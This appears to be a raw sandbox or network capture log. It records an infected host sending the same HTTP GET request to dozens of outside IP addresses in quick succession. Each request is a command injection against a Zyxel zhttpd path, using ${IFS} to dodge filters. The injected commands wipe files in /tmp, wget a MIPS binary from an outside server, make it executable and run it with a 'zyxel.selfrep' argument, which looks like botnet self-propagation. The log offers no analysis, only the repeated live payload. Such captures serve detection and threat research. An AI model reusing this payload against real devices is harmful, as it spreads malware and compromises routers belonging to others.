                                              Jan 29, 2024 07:03:54.098484993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5511192.168.2.144071282.208.106.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.098525047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5512192.168.2.1441638155.214.52.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.101780891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5513192.168.2.1451934158.241.45.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.101809978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5514192.168.2.1451586167.144.103.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.108716965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5515192.168.2.1434342182.180.25.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.108751059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5516192.168.2.1448354218.100.155.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.108789921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5517192.168.2.144425882.126.172.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.108819962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5518192.168.2.1460034168.4.251.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.108851910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5519192.168.2.1440804123.254.171.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.108884096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5520192.168.2.1454566175.118.249.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.108933926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5521192.168.2.1449614182.156.36.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.108983040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5522192.168.2.1445424221.212.12.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109029055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5523192.168.2.1449206198.233.232.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109066010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5524192.168.2.1457630162.182.117.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109096050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5525192.168.2.1454638101.183.225.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109147072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5526192.168.2.1439170135.228.219.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109172106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5527192.168.2.1436058110.110.193.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109205008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5528192.168.2.1432820194.232.227.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109260082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5529192.168.2.1440522114.113.65.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109301090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5530192.168.2.1458758144.14.44.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109344959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5531192.168.2.1442796203.36.32.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109402895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5532192.168.2.144939264.105.82.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109441996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5533192.168.2.1459788137.2.34.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109479904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5534192.168.2.146055459.168.203.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109505892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5535192.168.2.1454550197.98.51.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109544039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5536192.168.2.1453758147.5.181.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109577894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5537192.168.2.1445358179.171.24.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109617949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5538192.168.2.1447618207.156.148.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109657049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5539192.168.2.1433094140.184.62.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109708071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5540192.168.2.1454142118.26.131.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109735012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5541192.168.2.1440974145.81.224.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109757900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5542192.168.2.1437294195.140.147.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109803915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5543192.168.2.145984485.25.236.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109848022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5544192.168.2.143402484.211.106.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109865904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5545192.168.2.1433790130.84.228.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109916925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5546192.168.2.145685614.70.152.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109956026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5547192.168.2.1447334150.99.57.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.109986067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5548192.168.2.1444696207.108.220.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110018969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5549192.168.2.144630623.145.70.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110068083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5550192.168.2.143326840.138.58.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110114098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5551192.168.2.144032688.82.204.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110131979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5552192.168.2.145688087.143.254.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110174894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5553192.168.2.145669031.135.233.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110204935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5554192.168.2.1459318122.26.105.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110248089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5555192.168.2.145182244.79.171.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110279083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5556192.168.2.145830880.236.138.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110341072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5557192.168.2.1449182207.93.156.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110369921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5558192.168.2.1433942219.222.18.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110411882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5559192.168.2.1441842107.15.16.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110433102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5560192.168.2.143833295.255.171.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110476971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5561192.168.2.143736497.161.162.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110537052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5562192.168.2.143833082.176.155.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110560894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5563192.168.2.1445066118.115.243.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110620022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5564192.168.2.145016252.56.30.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110665083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5565192.168.2.1454312201.158.2.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110687017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5566192.168.2.143506649.175.182.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110752106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5567192.168.2.1457100104.146.94.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110761881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5568192.168.2.1449586188.214.59.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110802889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5569192.168.2.1437534114.226.188.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110861063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5570192.168.2.1436736216.178.180.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110899925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5571192.168.2.1451560124.235.237.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110938072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5572192.168.2.145536262.177.113.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.110975027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5573192.168.2.146043091.147.251.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111020088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5574192.168.2.144587450.30.117.195443
                                              TimestampBytes transferredDirectionData
